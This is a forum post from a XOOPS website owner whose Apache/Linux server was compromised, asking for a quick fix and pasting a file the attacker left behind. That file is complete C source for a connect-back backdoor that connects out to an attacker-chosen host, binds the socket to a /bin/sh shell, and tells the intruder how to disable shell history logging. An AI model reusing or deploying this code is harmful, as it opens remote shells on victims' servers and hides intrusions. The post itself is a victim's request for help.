1
My XOOPS web site is down, because of classic DOS -space quota- attack
Web site is on Appache, Linux server...
I found this temp file on the server left by attacker, may be it could give you more info:
" #include
#include
#include
#include
#include
int main(int argc, char **argv) {
char *host;
int port = 80;
int f;
int l;
int sock;
struct in_addr ia;
struct sockaddr_in sin, from;
struct hostent *he;
char msg[ ] = "Bem Vindo Creative_MX Let's Hack\n\n"
"Issue \"export TERM=xterm; exec bash -i\"\n"
"For More Reliable Shell.\n"
"Issue \"unset HISTFILE; unset SAVEHIST\"\n"
"For Not Getting Logged.\n(;\n\n";
printf("Ir4dex Connect Back Backdoor\n\n");
if (argc < 2 || argc > 3) {
printf("Usage: %s [Host] \n", argv[0]);
return 1;
}
printf("[*] Dumping Arguments\n");
l = strlen(argv[1]);
if (l <= 0) {
printf("[-] Invalid Host Name\n");
return 1;
}
if (!(host = (char *) malloc(l))) {
printf("[-] Unable to Allocate Memory\n");
return 1;
}
strncpy(host, argv[1], l);
if (argc == 3) {
port = atoi(argv[2]);
if (port <= 0 || port > 65535) {
printf("[-] Invalid Port Number\n");
return 1;
}
}
printf("[*] Resolvendo Nome Do Host\n");
he = gethostbyname(host);
if (he) {
memcpy(&ia.s_addr, he->h_addr, 4);
} else if ((ia.s_addr = inet_addr(host)) == INADDR_ANY) {
printf("[-] Unable to Resolve: %s\n", host);
return 1;
}
sin.sin_family = PF_INET;
sin.sin_addr.s_addr = ia.s_addr;
sin.sin_port = htons(port);
printf("[*] Conectando...\n");
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf("[-] Socket Error\n");
return 1;
}
if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {
printf("[-] Unable to Connect\n");
return 1;
}
printf("[*] Spawning Shell\n");
f = fork( );
if (f < 0) {
printf("[-] Unable to Fork\n");
return 1;
} else if (!f) {
write(sock, msg, sizeof(msg));
dup2(sock, 0);
dup2(sock, 1);
dup2(sock, 2);
execl("/bin/sh", "shell", NULL);
close(sock);
return 0;
}
printf("[*] Conectado\n\n");
return 0;
} "
Does anybody know a quick fix for this? Please!
